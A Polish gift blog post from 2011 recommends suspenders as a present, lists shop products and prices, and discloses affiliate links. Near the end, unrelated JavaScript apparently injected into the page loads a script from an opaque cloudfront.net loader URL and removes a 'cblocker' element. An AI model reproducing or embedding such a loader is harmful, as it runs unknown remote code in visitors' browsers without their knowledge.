Prezentuję drobiazg nie tylko dla maklerów

23 listopada 2011
zamiast skarpetek i krawata

Pisałam już niejednokrotnie o tym, że uważam dawanie mężczyznom kolejnej pary skarpetek albo kolejnego krawata za mało odkrywczy pomysł. Czasem jednak chcemy podarować im jakiś drobny element garderoby i ciężko nam wymyślić coś innego niż właśnie te uświęcone już tradycją rzeczy. Na takie okazje polecam bohatera, a właściwie bohaterki dzisiejszego wpisu.

Szelki – bo o nich mowa – dość długo kojarzyły się wyłącznie z maklerami, którzy na amerykańskich czy angielskich filmach nosili słynne już czerwone szelki. Nie oznacza to wcale, że nie mogą ich nosić także przedstawiciele innych zawodów. Poza tym są one de facto wygodniejsze niż noszone tradycyjnie przez większość mężczyzn paski, bo mniej uciskają pewne miejsca, które zwłaszcza po obfitszym obiedzie mogą ulec powiększeniu. I coś jest w tych szelkach takiego, że tworzą wrażenie większej elegancji stroju i osoby – może przez skojarzenie z angielskim dżentelmenem.


Pan M. posiada już dwie pary szelek, ale w tym roku w liście do Świętego Mikołaja poprosił o kolejną parę, więc najwyraźniej bardzo je lubi! Wydaje mi się, że większość mężczyzn chętnie posiadałaby co najmniej jedną parę – tak dla odmiany po wiecznym zaciskaniu pasa 😉 Co więcej, jak widać na ostatnim zdjęciu, szelki mogą być też ciekawym prezentem dla kobiet. Muszę się Wam przyznać, że sama kiedyś pożyczyłam szelki od Pana M. i co prawda użyłam ich jako elementu przebrania, ale czułam się w nich na tyle dobrze, że naprawdę rozważam kupienie sobie pary!

szelki do spodni czarne
Szelki do spodni czarne BR-001 – cena: 99 zł (www.galante.pl)

szelki do spodni czerwone
Szelki do spodni czerwone BR-005 – cena: 99 zł (www.galante.pl)

szelki do spodni
Szelki do spodni granatowe ze wzorkiem – cena: 109 zł (www.galante.pl)

szelki dla kobiety
Szelki DY2p25.000 – cena: 21 zł (suspenders.com.pl/)

Kupując szelki zwróćcie uwagę na zapięcia – powinny być zabezpieczone plastikowymi elementami, tak żeby nie niszczyć spodni, do których będą przypinane. Warto też postawić na ciekawy kolor lub fakturę szelek, bo wtedy prezent nabierze jeszcze większej oryginalności. A jeśli same szelki wydają Wam się zbyt drobnym prezentem to zawsze możecie dołączyć do nich spinki do mankietów albo koszulę.


P.S. Zdjęcia pochodzą ze stron www.galante.pl oraz suspenders.com.pl/

Zawarte w tym wpisie linki do sklepu Galante.pl to tak zwane linki afiliacyjne. Oznacza to, iż jeśli klikając na nie dokonacie zakupu otrzymam z tego tytułu prowizję. Nie zmieni to w żaden sposób ceny jaką Wy zapłacicie za zamówione produkty, a pokaże mi, że doceniacie moje rekomendacje. Będę Wam bardzo wdzięczna za korzystanie z tych linków.


if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220&zoneid=14731&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi:

Kategoria: , , , , , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję ciąg dalszy serii dla zmarźluchów

Następny

Prezentuję inaugurację sezonu świątecznego 2011

Comments are closed here.